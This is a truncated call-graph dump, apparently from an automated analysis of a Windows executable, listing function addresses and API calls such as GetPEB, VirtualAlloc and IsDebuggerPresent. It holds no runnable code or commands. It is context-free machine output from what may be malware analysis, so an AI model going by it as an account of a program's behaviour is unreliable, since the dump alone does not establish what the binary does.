calls 4 library calls 42718->42738 42721 41f363 ctype 112 API calls 42719->42721 42722 40ef17 42721->42722 42723 40ef2f 42722->42723 42724 40ef24 UnhookWindowsHookEx 42722->42724 42723->42696 42724->42723 42725->42700 42728 41eae2 42727->42728 42730 41eae7 ctype 42727->42730 42737 406436 2 API calls 4 library calls 42728->42737 42730->42711 42732 4049da 42731->42732 42733 4049ac 42731->42733 42732->42714 42734 4049ba GetLastError 42733->42734 42735 4049c4 ctype 42733->42735 42734->42735 42735->42732 42736 4049d3 SetLastError 42735->42736 42736->42732 42737->42730 42738->42719 42757 40edc8 42739->42757 42741 40ee74 42743 40ee85 42741->42743 42765 406436 2 API calls 4 library calls 42741->42765 42743->42651 42745 40f639 __EH_prolog3_catch 42744->42745 42746 420aec ctype 106 API calls 42745->42746 42747 40f648 42746->42747 42748 40f65f 42747->42748 42800 406436 2 API calls 4 library calls 42747->42800 42750 40f6b6 42748->42750 42801 40d7c1 GetWindowRect GetWindowLongA 42748->42801 42775 422024 42750->42775 42789 40cdeb 42750->42789 42752 40f6c7 42753 40f6df std::_Locinfo::~_Locinfo 42752->42753 42802 40f5b7 148 API calls ctype 42752->42802 42753->42651 42758 40edd4 __EH_prolog3 42757->42758 42766 41f396 42758->42766 42760 40edd9 ~_Task_impl 42761 404461 ctype 69 API calls 42760->42761 42763 40ee20 std::_Locinfo::~_Locinfo ~_Task_impl 42760->42763 42762 40edfa 42761->42762 42762->42763 42771 42474e 71 API calls 3 library calls 42762->42771 42763->42741 42765->42743 42767 41f363 ctype 112 API calls 42766->42767 42768 41f39b 42767->42768 42772 409f26 42768->42772 42771->42763 42773 420aec ctype 106 API calls 42772->42773 42774 409f30 42773->42774 42774->42760 42776 4220fe 42775->42776 42779 42203c 42775->42779 42777 40cdeb 453 API calls 42776->42777 42778 422073 42777->42778 42778->42752 42779->42776 42779->42778 42780 422097 42779->42780 42781 422085 42779->42781 42804 410293 42780->42804 42781->42780 42783 422089 42781->42783 42803 403ac0 SendMessageA 42783->42803 42787 422095 42787->42778 42788 4220a8 42788->42776 42788->42778 42863 401180 42789->42863 42885 4115c3 42789->42885 42892 4221c7 42789->42892 42895 40ed96 42789->42895 42903 4110c4 42789->42903 42790 40ce0f 42791 40ce26 42790->42791 42983 4044b6 DefFrameProcA 42790->42983 42984 404644 DefMDIChildProcA 42790->42984 42985 40ccc8 42790->42985 42791->42752 42800->42748 42801->42750 42802->42753 42803->42787 42805 4102a3 42804->42805 42806 41029a GetParent 42804->42806 42810 40ee3c 42805->42810 42806->42805 42809 403ac0 SendMessageA 42809->42788 42811 40edc8 ~_Task_impl 112 API calls 42810->42811 42812 40ee4a 42811->42812 42817 4247d7 42812->42817 42814 40ee56 42829 412d43 42814->42829 42818 4247e3 __EH_prolog3_catch 42817->42818 42821 4247ec std::_Locinfo::~_Locinfo ~_Task_impl 42818->42821 42834 424500 42818->42834 42821->42814 42822 424500 ~_Task_impl 2 API calls 42823 42480c ~_Task_impl 42822->42823 42823->42821 42838 42fba4 42823->42838 42826 424846 42843 4246c7 42826->42843 42830 40ee60 42829->42830 42831 412d4f 42829->42831 42830->42809 42831->42830 42832 412d55 GetParent 42831->42832 42833 424500 ~_Task_impl 2 API calls 42832->42833 42833->42830 42835 424509 42834->42835 42837 42450e 42834->42837 42849 406436 2 API calls 4 library calls 42835->42849 42837->42821 42837->42822 42839 42fbaf 42838->42839 42840 42483b 42838->42840 42850 423a41 42839->42850 42840->42826 42842 4063fe RaiseException __CxxThrowException@8 42840->42842 42846 4246e2 ~_Task_impl 42843->42846 42844 4246fe 42844->42821 42845 4246f7 42859 424677 42845->42859 42846->42844 42846->42845 42858 42441c 69 API calls 2 library calls 42846->42858 42849->42837 42851 423a6e 42850->42851 42852 423a4d 42850->42852 42854 406436 ~_Task_impl LocalAlloc RaiseException 42851->42854 42852->42851 42853 423a53 42852->42853 42855 404461 ctype 69 API calls 42853->42855 42856 423a73 42854->42856 42857 423a60 42855->42857 42857->42840 42858->42845 42860 424682 42859->42860 42862 424690 42859->42862 42861 423a41 ~_Task_impl 71 API calls 42860->42861 42861->42862 42862->42844 42990 40a58e 42863->42990 42866 401192 42866->42790 42868 401251 42868->42790 42874 401248 42874->42790 42876 401218 42876->42874 43037 413276 42876->43037 42878 401228 43043 412f2d 42878->43043 42880 401234 43051 412fbe 42880->43051 42886 41f4e8 112 API calls 42885->42886 42887 4115c9 42886->42887 43325 4134c3 CopyRect 42887->43325 42890 41167e 42890->42790 43368 422111 42892->43368 42896 420aec ctype 106 API calls 42895->42896 42897 40edaa 42896->42897 42898 40edb3 42897->42898 43407 406436 2 API calls 4 library calls 42897->43407 42902 40ccc8 2 API calls 42898->42902 43406 404644 DefMDIChildProcA 42898->43406 42900 40edc6 42900->42790 42902->42900 42904 4110d0 __EH_prolog3 42903->42904 42906 4110ec 42904->42906 42907 411155 42904->42907 42908 411145 42904->42908 42905 411138 43440 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42905->43440 42906->42905 42960 411102 42906->42960 42911 41115a 42907->42911 42917 41116e 42907->42917 42909 40ee3c ~_Task_impl 113 API calls 42908->42909 42912 41114b 42909->42912 43436 410af5 121 API calls 2 library calls 42911->43436 43435 410a7d 120 API calls 42912->43435 42913 4112e0 std::_Locinfo::~_Locinfo 42913->42790 42916 41116a 42916->42917 42916->42960 42917->42960 43408 40d713 42917->43408 42919 41167e 42919->42790 42923 4112c5 43439 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42923->43439 42925 41121d 42977 4134c3 140 API calls 42925->42977 42926 41120c 42926->42905 42926->42923 42926->42925 42928 411342 42926->42928 42929 41148d 42926->42929 42930 411350 42926->42930 42931 411498 42926->42931 42932 4114c4 42926->42932 42933 41141b 42926->42933 42934 41131a 42926->42934 42935 4114a2 42926->42935 42936 4114e4 42926->42936 42937 411326 42926->42937 42938 411472 42926->42938 42939 4114f2 42926->42939 42940 4113f4 42926->42940 42941 4114b7 42926->42941 42942 4112fa 42926->42942 42945 411506 42926->42945 42946 41164a 42926->42946 42947 41145c 42926->42947 42952 411302 42926->42952 42926->42960 42963 41142a 42926->42963 42969 4113bd 42926->42969 43438 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42926->43438 42958 40ee3c ~_Task_impl 113 API calls 42928->42958 43449 422d89 112 API calls ctype 42929->43449 43442 40d77c 112 API calls 42930->43442 42956 41f4e8 112 API calls 42931->42956 42965 40ee3c ~_Task_impl 113 API calls 42932->42965 42949 41f4e8 112 API calls 42933->42949 42953 40ee3c ~_Task_impl 113 API calls 42934->42953 42957 41f4e8 112 API calls 42935->42957 42943 40ee3c ~_Task_impl 113 API calls 42936->42943 42955 40ee3c ~_Task_impl 113 API calls 42937->42955 42951 40ee3c ~_Task_impl 113 API calls 42938->42951 42944 40ee3c ~_Task_impl 113 API calls 42939->42944 42948 40ee3c ~_Task_impl 113 API calls 42940->42948 42964 40ee3c ~_Task_impl 113 API calls 42941->42964 43441 422d89 112 API calls ctype 42942->43441 42943->42960 42944->42947 42959 40ee3c ~_Task_impl 113 API calls 42945->42959 42945->42960 43450 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42946->43450 43430 4050e4 42947->43430 42948->42960 42949->42960 42962 41147a 42951->42962 42981 40ed96 109 API calls 42952->42981 43414 404801 42952->43414 43417 40547d 42952->43417 42953->42960 42955->42960 42956->42963 42957->42947 42958->42925 42959->42947 43451 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 42960->43451 42966 40ee3c ~_Task_impl 113 API calls 42962->42966 43422 4074cb 42963->43422 43427 41324e 42963->43427 42964->42963 42965->42947 42966->42947 42968 41136a 42970 40ee68 112 API calls 42968->42970 43444 422e06 42969->43444 42972 41137c 42970->42972 42973 411392 42972->42973 42974 424500 ~_Task_impl 2 API calls 42972->42974 43443 40f76d 113 API calls 4 library calls 42973->43443 42974->42973 42977->42960 42981->42960 42983->42791 42984->42791 42986 40ccd7 42985->42986 42987 40ccf9 CallWindowProcA 42985->42987 42986->42987 42989 40cce5 DefWindowProcA 42986->42989 42988 40cd0c 42987->42988 42988->42791 42989->42988 42991 40a59a 42990->42991 42992 40a59f 42990->42992 43067 406436 2 API calls 4 library calls 42991->43067 43057 408bca 42992->43057 42996 406d2e 43151 407991 42996->43151 42999 406e6a 43000 41f363 ctype 112 API calls 42999->43000 43001 406e79 FindResourceA 43000->43001 43002 406e92 43001->43002 43003 4011ce 43001->43003 43185 406b0c 83 API calls 2 library calls 43002->43185 43003->42868 43007 406673 43003->43007 43005 406e9b 43186 4065d7 GetObjectA DeleteObject LocalAlloc RaiseException ctype 43005->43186 43010 40669e _memset 43007->43010 43008 412b38 GetWindowLongA 43008->43010 43009 406756 43011 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43009->43011 43010->43008 43010->43009 43012 4011e0 43011->43012 43012->42868 43013 40b7a6 43012->43013 43187 40b954 43013->43187 43016 40c1d8 43017 40c1e4 __EH_prolog3 43016->43017 43194 40bdcd 43017->43194 43020 40c2b8 std::_Locinfo::~_Locinfo 43020->42876 43021 40c2ad 43206 40bf7c 85 API calls 3 library calls 43021->43206 43022 40c20d SendMessageA 43200 422e1f 113 API calls 2 library calls 43022->43200 43025 40c225 43035 40c238 43025->43035 43201 40b938 SelectObject 43025->43201 43027 40c289 43028 40c29e 43027->43028 43204 40b938 SelectObject 43027->43204 43205 422e73 114 API calls 3 library calls 43028->43205 43031 40c2c3 GetSystemMetrics 43031->43035 43032 40c2aa 43032->43021 43033 402720 118 API calls 43033->43035 43035->43027 43035->43031 43035->43033 43202 40bd78 GetTextExtentPoint32A 43035->43202 43203 40be87 82 API calls 3 library calls 43035->43203 43038 413282 __EH_prolog3 43037->43038 43039 404461 ctype 69 API calls 43038->43039 43042 4132a0 43038->43042 43039->43042 43040 4132c4 GetParent 43041 4132d0 std::_Locinfo::~_Locinfo 43040->43041 43041->42878 43042->43040 43042->43041 43047 412f39 __EH_prolog3 43043->43047 43045 412fb6 std::_Locinfo::~_Locinfo 43045->42880 43046 404461 ctype 69 API calls 43046->43047 43047->43045 43047->43046 43218 409833 43047->43218 43223 41346c 43047->43223 43231 4133f9 113 API calls 2 library calls 43047->43231 43232 42280e RaiseException __CxxThrowException@8 43047->43232 43052 412fd5 43051->43052 43053 412fcd 43051->43053 43239 412e38 43052->43239 43054 409833 3 API calls 43053->43054 43054->43052 43058 40ed96 109 API calls 43057->43058 43059 408bd7 43058->43059 43060 40118d 43059->43060 43068 4085ab 43059->43068 43073 404cb4 43059->43073 43080 408ba3 43059->43080 43060->42866 43060->42996 43061 408bf1 43061->43060 43062 408bf5 PostMessageA 43061->43062 43084 409c7d 43062->43084 43067->42992 43069 4085c2 43068->43069 43070 4085b6 GetMenu 43068->43070 43097 41f4e8 43069->43097 43070->43069 43072 4085d7 43072->43061 43074 404cc3 GetMenuItemCount 43073->43074 43075 404cde 43073->43075 43110 4049db 113 API calls 43074->43110 43100 404cf2 43075->43100 43081 408bbf 43080->43081 43082 408baf 43080->43082 43081->43061 43082->43081 43111 408b24 43082->43111 43085 409c97 43084->43085 43093 409d42 43084->43093 43123 412b38 43085->43123 43087 409cd0 43088 409d44 43087->43088 43089 409cd9 43087->43089 43126 40f201 43088->43126 43090 40f201 128 API calls 43089->43090 43092 409d02 43090->43092 43094 40f201 128 API calls 43092->43094 43093->43060 43095 409d1c 43094->43095 43147 412d05 43095->43147 43098 41f474 moneypunct 112 API calls 43097->43098 43099 41f4f4 43098->43099 43101 404d0e 43100->43101 43102 404d3e 43101->43102 43103 412b6c GetWindowLongA SetWindowLongA SetWindowPos 43101->43103 43104 41f363 ctype 112 API calls 43102->43104 43103->43102 43105 404d43 43104->43105 43106 40492c 115 API calls 43105->43106 43107 404d68 43106->43107 43108 404ced 43107->43108 43109 404d7c BringWindowToTop 43107->43109 43108->43061 43109->43108 43110->43075 43112 408b3b 43111->43112 43113 406436 ~_Task_impl LocalAlloc RaiseException 43112->43113 43114 408b46 43112->43114 43113->43112 43115 41e928 LocalAlloc RaiseException 43114->43115 43116 408b4b 43115->43116 43117 408b51 43116->43117 43122 4185a1 453 API calls 43116->43122 43117->43081 43118 408b7a 43118->43117 43119 412b52 GetWindowLongA 43118->43119 43120 408b85 43119->43120 43120->43117 43121 412b98 GetWindowLongA SetWindowLongA SetWindowPos 43120->43121 43121->43117 43122->43118 43124 412b4a 43123->43124 43125 412b3e GetWindowLongA 43123->43125 43125->43087 43127 40f226 43126->43127 43128 40f22f GetClientRect 43126->43128 43129 40f259 43127->43129 43130 40f24c BeginDeferWindowPos 43127->43130 43128->43127 43131 40f25d GetTopWindow 43129->43131 43130->43131 43140 40f279 43131->43140 43132 40f2b1 43134 40f2e1 43132->43134 43135 40f2b7 43132->43135 43133 40f26a GetDlgCtrlID 43136 40ee68 112 API calls 43133->43136 43139 40f338 43134->43139 43142 40ee3c ~_Task_impl 113 API calls 43134->43142 43137 40f2cb 43135->43137 43138 40f2bc CopyRect 43135->43138 43136->43140 43137->43093 43138->43137 43139->43137 43141 40f33d KiUserCallbackDispatcher 43139->43141 43140->43132 43140->43133 43143 40f2a2 GetWindow 43140->43143 43144 40f291 SendMessageA 43140->43144 43141->43137 43145 40f2f3 43142->43145 43143->43140 43144->43143 43145->43139 43146 40cee2 7 API calls 43145->43146 43146->43139 43148 412d10 SetWindowPos 43147->43148 43149 412d37 43147->43149 43148->43093 43152 4079a6 43151->43152 43153 411f96 126 API calls 43152->43153 43154 4079d0 43153->43154 43165 40791d 43154->43165 43161 4011ba 43161->42868 43161->42999 43162 407a0f 43184 406db6 IsWindow SendMessageA SendMessageA SendMessageA InvalidateRect 43162->43184 43164 407a2e 43164->43161 43166 40798f 43165->43166 43167 40792f 43165->43167 43173 4064f0 43166->43173 43168 41f363 ctype 112 API calls 43167->43168 43169 407936 43168->43169 43170 407887 ctype 2 API calls 43169->43170 43171 407940 GetProcAddress 43170->43171 43172 407957 _memset 43171->43172 43172->43166 43174 406505 GetDC GetSystemMetrics CreateFontA 43173->43174 43175 406588 SetRectEmpty 43173->43175 43176 406551 GetCharWidthA 43174->43176 43177 406548 SelectObject 43174->43177 43180 40d84a 43175->43180 43178 406576 ReleaseDC 43176->43178 43179 406567 SelectObject DeleteObject 43176->43179 43177->43176 43178->43175 43179->43178 43181 40d859 43180->43181 43183 410f67 118 API calls 43181->43183 43182 407a0b 43182->43161 43182->43162 43183->43182 43184->43164 43185->43005 43186->43003 43188 412b38 GetWindowLongA 43187->43188 43189 40b983 43188->43189 43190 411f96 126 API calls 43189->43190 43191 40b99a SetRectEmpty 43190->43191 43192 40d84a 118 API calls 43191->43192 43193 401206 43192->43193 43193->42874 43193->43016 43195 40bde1 ctype 43194->43195 43207 420da0 43195->43207 43197 40be28 43197->43020 43197->43021 43197->43022 43198 40be03 43198->43197 43199 4014c0 ctype 82 API calls 43198->43199 43199->43198 43200->43025 43201->43035 43202->43035 43203->43035 43204->43028 43205->43032 43206->43020 43208 420db3 43207->43208 43210 420dd9 43208->43210 43212 420dd0 43208->43212 43215 406436 2 API calls 4 library calls 43208->43215 43214 420de9 43210->43214 43217 4316f6 69 API calls 7 library calls 43210->43217 43216 434693 69 API calls 2 library calls 43212->43216 43214->43198 43215->43208 43216->43210 43217->43214 43219 409843 43218->43219 43220 40983f 43218->43220 43219->43220 43233 408692 43219->43233 43220->43047 43224 413482 43223->43224 43225 41347d 43223->43225 43227 411f96 126 API calls 43224->43227 43238 406436 2 API calls 4 library calls 43225->43238 43228 413497 SetRectEmpty 43227->43228 43229 40d84a 118 API calls 43228->43229 43230 4134be 43229->43230 43230->43047 43231->43047 43234 4086a0 43233->43234 43235 4086a5 GetDlgCtrlID 43233->43235 43237 406436 2 API calls 4 library calls 43234->43237 43235->43219 43235->43220 43237->43235 43238->43224 43244 412e45 43239->43244 43241 412e87 43246 414166 43241->43246 43244->43241 43245 409833 3 API calls 43244->43245 43293 406436 2 API calls 4 library calls 43244->43293 43245->43244 43247 414198 43246->43247 43249 4141a1 GetWindowRect 43247->43249 43314 406436 2 API calls 4 library calls 43247->43314 43250 4141e0 43249->43250 43251 4141b9 43249->43251 43254 41423c 43250->43254 43294 412d87 43250->43294 43252 4141c5 EqualRect 43251->43252 43292 414422 43251->43292 43252->43250 43252->43292 43253 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43255 401240 43253->43255 43315 420d66 115 API calls 43254->43315 43255->42790 43257 41422d 43303 41fc5a 43257->43303 43260 414270 43261 41429c 43260->43261 43262 41427e IsWindowVisible 43260->43262 43264 4142b9 43261->43264 43265 41436e 43261->43265 43262->43261 43263 41428b 43262->43263 43267 412d05 SetWindowPos 43263->43267 43316 413342 CopyRect 43264->43316 43319 4133a2 71 API calls 43265->43319 43267->43261 43269 41437a 43320 4133a2 71 API calls 43269->43320 43270 4142ca 43317 422bfb GetWindowLongA ScreenToClient ScreenToClient 43270->43317 43273 414386 43275 412d05 SetWindowPos 43273->43275 43274 4142d8 43318 41365c 75 API calls 2 library calls 43274->43318 43277 4143a5 GetParent 43275->43277 43280 40ee3c ~_Task_impl 113 API calls 43277->43280 43278 414326 43279 412d05 SetWindowPos 43278->43279 43281 414364 43279->43281 43282 4143b4 43280->43282 43281->43277 43285 4143c0 43282->43285 43321 4133d6 114 API calls ~_Task_impl 43282->43321 43284 4143f7 43287 414413 43284->43287 43288 412d05 SetWindowPos 43284->43288 43285->43284 43322 413a2c 117 API calls 2 library calls 43285->43322 43323 4139c3 72 API calls ctype 43287->43323 43288->43287 43290 41441b 43324 408487 114 API calls ~_Task_impl 43290->43324 43292->43253 43293->43244 43295 412d93 __EH_prolog3 43294->43295 43296 412d9b GetWindowTextA 43295->43296 43297 412dac 43295->43297 43299 412df0 ctype std::_Locinfo::~_Locinfo 43296->43299 43298 4014c0 ctype 82 API calls 43297->43298 43300 412db4 43298->43300 43299->43257 43301 4048ed ctype 79 API calls 43300->43301 43302 412dd7 lstrlenA 43301->43302 43302->43299 43304 41fc7c 43303->43304 43305 41fc85 lstrlenA 43304->43305 43306 406436 ~_Task_impl LocalAlloc RaiseException 43304->43306 43307 41fca8 _memset 43305->43307 43306->43304 43308 41fcb4 GetWindowTextA 43307->43308 43309 41fcd9 SetWindowTextA 43307->43309 43308->43309 43310 41fcc7 lstrcmpA 43308->43310 43311 41fce1 43309->43311 43310->43309 43310->43311 43312 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43311->43312 43313 41fcee 43312->43313 43313->43254 43314->43247 43315->43260 43316->43270 43317->43274 43318->43278 43319->43269 43320->43273 43321->43285 43322->43284 43323->43290 43324->43292 43329 4217b7 43325->43329 43328 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43328->42890 43330 4217cf 43329->43330 43331 411663 43330->43331 43332 4217e8 CopyRect 43330->43332 43331->43328 43333 421819 43332->43333 43337 420e08 43333->43337 43341 413b62 43337->43341 43340 40cee2 7 API calls 43340->43331 43342 413b76 43341->43342 43343 406436 ~_Task_impl LocalAlloc RaiseException 43342->43343 43344 413b89 IsRectEmpty 43342->43344 43346 40f898 ~_Task_impl 114 API calls 43342->43346 43347 413bcb GetClientRect 43342->43347 43343->43342 43344->43342 43345 413b9a 43344->43345 43348 413bf9 BeginDeferWindowPos 43345->43348 43353 413bf3 43345->43353 43346->43342 43347->43345 43348->43353 43349 413fd5 43350 413ff2 SetRectEmpty 43349->43350 43352 413fe9 KiUserCallbackDispatcher 43349->43352 43354 41400d 43350->43354 43351 413638 ctype LocalAlloc RaiseException 43351->43353 43352->43350 43353->43349 43353->43351 43355 413cb5 GetWindowRect 43353->43355 43357 413cec OffsetRect 43353->43357 43358 413e35 OffsetRect 43353->43358 43359 413e84 OffsetRect 43353->43359 43360 413d3f OffsetRect 43353->43360 43361 413e6e OffsetRect 43353->43361 43362 413d5c EqualRect 43353->43362 43363 413ed3 EqualRect 43353->43363 43364 413d25 OffsetRect 43353->43364 43365 40b917 LocalAlloc RaiseException ctype 43353->43365 43366 40cee2 7 API calls 43353->43366 43367 4260f4 71 API calls 43353->43367 43354->43331 43354->43340 43356 422bfb GetWindowLongA ScreenToClient ScreenToClient 43355->43356 43356->43353 43357->43353 43358->43353 43359->43363 43360->43362 43361->43353 43362->43353 43363->43353 43364->43353 43365->43353 43366->43353 43367->43353 43369 412b38 GetWindowLongA 43368->43369 43370 422120 43369->43370 43371 42216a 43370->43371 43372 412d05 SetWindowPos 43370->43372 43373 412b38 GetWindowLongA 43371->43373 43372->43371 43375 422171 43373->43375 43374 4221be 43374->42790 43375->43374 43376 412b38 GetWindowLongA 43375->43376 43378 422184 43375->43378 43376->43378 43377 410293 114 API calls 43379 42218f 43377->43379 43378->43374 43378->43377 43381 4221aa 43379->43381 43392 40f898 114 API calls ~_Task_impl 43379->43392 43381->43374 43383 4077c6 43381->43383 43384 4077e8 43383->43384 43385 40786b 43384->43385 43390 41246b 251 API calls 43384->43390 43393 412611 43384->43393 43399 40fbd2 264 API calls 3 library calls 43385->43399 43387 407876 43388 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43387->43388 43389 407883 43388->43389 43389->43374 43390->43384 43392->43381 43394 412625 43393->43394 43395 412672 43393->43395 43394->43395 43396 41263c 43394->43396 43405 406436 2 API calls 4 library calls 43394->43405 43395->43384 43396->43395 43400 40773c 43396->43400 43399->43387 43401 40684f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 43400->43401 43402 407759 43401->43402 43403 40705f 15 API calls 43402->43403 43404 407779 43403->43404 43404->43395 43405->43396 43406->42900 43407->42898 43409 40d725 43408->43409 43410 40d73d 43409->43410 43462 406436 2 API calls 4 library calls 43409->43462 43452 424385 43410->43452 43413 40d743 43413->42926 43437 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43413->43437 43415 408bca 453 API calls 43414->43415 43416 404814 43415->43416 43416->42960 43418 40ed96 109 API calls 43417->43418 43419 40548a 43418->43419 43420 4054ac 43419->43420 43421 40549a SetWindowLongA 43419->43421 43420->42960 43421->43420 43465 42143d DefWindowProcA 43422->43465 43425 40750b 43425->42960 43426 4074fe InvalidateRect 43426->43425 43428 42143d 10 API calls 43427->43428 43429 41326e 43428->43429 43429->42960 43472 409dd7 43430->43472 43434 405101 43434->42960 43435->42907 43436->42916 43437->42926 43438->42926 43439->42905 43440->42913 43442->42968 43443->42969 43445 422e12 43444->43445 43446 422e1e 43444->43446 43478 422dd3 43445->43478 43446->42960 43448 422e17 DeleteDC 43448->43446 43450->42925 43451->42919 43453 424395 43452->43453 43454 42439a 43452->43454 43463 406436 2 API calls 4 library calls 43453->43463 43456 4243a8 43454->43456 43464 42431c InitializeCriticalSection 43454->43464 43458 4243e4 EnterCriticalSection 43456->43458 43459 4243ba EnterCriticalSection 43456->43459 43458->43413 43460 4243c6 InitializeCriticalSection 43459->43460 43461 4243d9 LeaveCriticalSection 43459->43461 43460->43461 43461->43458 43462->43409 43463->43454 43464->43456 43466 421464 GetWindowRect 43465->43466 43470 4074ee 43465->43470 43467 421491 43466->43467 43468 4214ed 43466->43468 43467->43468 43469 42149d SetRect InvalidateRect SetRect InvalidateRect 43467->43469 43468->43470 43471 4214fd SetRect InvalidateRect SetRect InvalidateRect 43468->43471 43469->43468 43470->43425 43470->43426 43471->43470 43473 40ed96 109 API calls 43472->43473 43475 409de4 43473->43475 43474 4050fa 43477 40474e 115 API calls ~_Task_impl 43474->43477 43475->43474 43476 409c7d 130 API calls 43475->43476 43476->43474 43477->43434 43479 422de0 43478->43479 43480 422de7 ctype 43478->43480 43482 422d15 112 API calls 4 library calls 43479->43482 43480->43448 43482->43480 43493 4014f0 43483->43493 43485 429320 GetShortPathNameA 43486 429333 43485->43486 43487 429341 43485->43487 43495 402830 82 API calls ctype 43486->43495 43489 40a356 82 API calls 43487->43489 43490 42934a 43489->43490 43491 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43490->43491 43492 416ac5 PathFindFileNameA 43491->43492 43492->42293 43494 40150d ctype 43493->43494 43494->43485 43495->43487 43496->42300 43497 44d144 43502 4498f9 43497->43502 43503 41f363 ctype 112 API calls 43502->43503 43504 449903 43503->43504 43505 449914 43504->43505 43510 438d85 113 API calls 9 library calls 43504->43510 43507 430b0e 43505->43507 43511 430ad2 43507->43511 43509 430b1b 43510->43505 43512 430ade _setvbuf 43511->43512 43519 4339cb 43512->43519 43518 430aff _setvbuf 43518->43509 43545 43a0bf 43519->43545 43521 430ae3 43522 4309e7 43521->43522 43554 435eef TlsGetValue 43522->43554 43525 435eef __decode_pointer 7 API calls 43526 430a0b 43525->43526 43538 430a8e 43526->43538 43566 4344b4 70 API calls 5 library calls 43526->43566 43528 430a75 43529 435e74 __encode_pointer 7 API calls 43528->43529 43531 430a83 43529->43531 43530 430a29 43530->43528 43532 430a53 43530->43532 43533 430a44 43530->43533 43535 435e74 __encode_pointer 7 API calls 43531->43535 43534 430a4d 43532->43534 43532->43538 43567 438222 75 API calls _realloc 43533->43567 43534->43532 43539 430a69 43534->43539 43568 438222 75 API calls _realloc 43534->43568 43535->43538 43542 430b08 43538->43542 43569 435e74 TlsGetValue 43539->43569 43540 430a63 43540->43538 43540->43539 43583 4339d4 43542->43583 43546 43a0e7 EnterCriticalSection 43545->43546 43547 43a0d4 43545->43547 43546->43521 43552 439ffc 69 API calls 10 library calls 43547->43552 43549 43a0da 43549->43546 43553 43395f 69 API calls 3 library calls 43549->43553 43551 43a0e6 43551->43546 43552->43549 43553->43551 43555 435f07 43554->43555 43556 435f28 GetModuleHandleW 43554->43556 43555->43556 43557 435f11 TlsGetValue 43555->43557 43558 435f43 GetProcAddress 43556->43558 43559 435f38 43556->43559 43562 435f1c 43557->43562 43561 435f20 43558->43561 43581 43392f Sleep GetModuleHandleW 43559->43581 43564 435f53 RtlDecodePointer 43561->43564 43565 4309fb 43561->43565 43562->43556 43562->43561 43563 435f3e 43563->43558 43563->43565 43564->43565 43565->43525 43566->43530 43567->43534 43568->43540 43570 435ead GetModuleHandleW 43569->43570 43571 435e8c 43569->43571 43573 435ec8 GetProcAddress 43570->43573 43574 435ebd 43570->43574 43571->43570 43572 435e96 TlsGetValue 43571->43572 43577 435ea1 43572->43577 43576 435ea5 43573->43576 43582 43392f Sleep GetModuleHandleW 43574->43582 43579 435ee0 43576->43579 43580 435ed8 RtlEncodePointer 43576->43580 43577->43570 43577->43576 43578 435ec3 43578->43573 43578->43579 43579->43528 43580->43579 43581->43563 43582->43578 43586 439fe5 LeaveCriticalSection 43583->43586 43585 430b0d 43585->43518 43586->43585 43587 40f720 43588 40f733 43587->43588 43594 40f72e 43587->43594 43589 40ee68 112 API calls 43588->43589 43590 40f73d 43589->43590 43591 40f758 DefWindowProcA 43590->43591 43592 40f746 43590->43592 43591->43594 43593 40f62d 453 API calls 43592->43593 43593->43594 43595 4037c0 43632 403130 43595->43632 43606 4035a0 112 API calls 43607 403811 43606->43607 43608 403690 108 API calls 43607->43608 43609 40381a 43608->43609 43610 4035a0 112 API calls 43609->43610 43611 40382b 43610->43611 43612 403690 108 API calls 43611->43612 43613 403834 43612->43613 43614 4035a0 112 API calls 43613->43614 43615 403845 43614->43615 43616 403690 108 API calls 43615->43616 43617 40384e 43616->43617 43665 402ef0 LoadStringW 43617->43665 43619 403884 43670 430d56 43619->43670 43622 4035a0 112 API calls 43623 4038aa 43622->43623 43624 403690 108 API calls 43623->43624 43625 4038b3 ctype 43624->43625 43626 4038cb VirtualAlloc 43625->43626 43627 4038f7 _setlocale 43626->43627 43628 402ef0 71 API calls 43627->43628 43629 403908 43628->43629 43674 403700 108 API calls std::ios_base::_Init 43629->43674 43631 403920 ctype 43633 403166 43632->43633 43675 402fd0 43633->43675 43635 40326d 43681 4030c0 43635->43681 43640 403340 43641 402fd0 71 API calls 43640->43641 43642 403380 43641->43642 43645 403388 43642->43645 43691 448692 43642->43691 43643 403432 43644 4030c0 71 API calls 43643->43644 43647 403441 43644->43647 43645->43643 43717 402d20 70 API calls 3 library calls 43645->43717 43649 402f80 43647->43649 43650 402f94 43649->43650 43651 402fcb 43650->43651 43804 402d20 70 API calls 3 library calls 43650->43804 43653 4035a0 43651->43653 43805 401af0 GetPEB 43653->43805 43655 402ef0 71 API calls 43657 4035cc ctype 43655->43657 43657->43655 43659 430d56 80 API calls 43657->43659 43660 4035df 43657->43660 43806 430fcd 80 API calls 2 library calls 43657->43806 43807 403470 43657->43807 43659->43657 43661 403690 43660->43661 43662 4036c2 43661->43662 43663 4036dd 43661->43663 43662->43663 43664 403470 108 API calls 43662->43664 43663->43606 43664->43662 43666 402f16 43665->43666 43667 402f3e 43665->43667 43814 402ab0 70 API calls 2 library calls 43666->43814 43667->43619 43669 402f38 43669->43619 43671 430d40 43670->43671 43815 43882f 43671->43815 43674->43631 43676 40300c 43675->43676 43679 403014 43675->43679 43688 4474d7 EnterCriticalSection std::_Lockit::_Lockit 43676->43688 43678 403037 43678->43635 43687 402d20 70 API calls 3 library calls 43678->43687 43679->43678 43680 402f80 70 API calls 43679->43680 43680->43678 43682 4030f5 43681->43682 43684 403100 43682->43684 43689 403060 70 API calls 43682->43689 43685 40311f 43684->43685 43690 4474e0 LeaveCriticalSection std::_Locinfo::~_Locinfo 43684->43690 43685->43640 43687->43635 43688->43679 43689->43684 43690->43685 43692 44869e __EH_prolog3_GS 43691->43692 43694 4486a8 43692->43694 43696 4486fa 43692->43696 43697 4486eb 43692->43697 43721 431b87 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 43694->43721 43722 448494 70 API 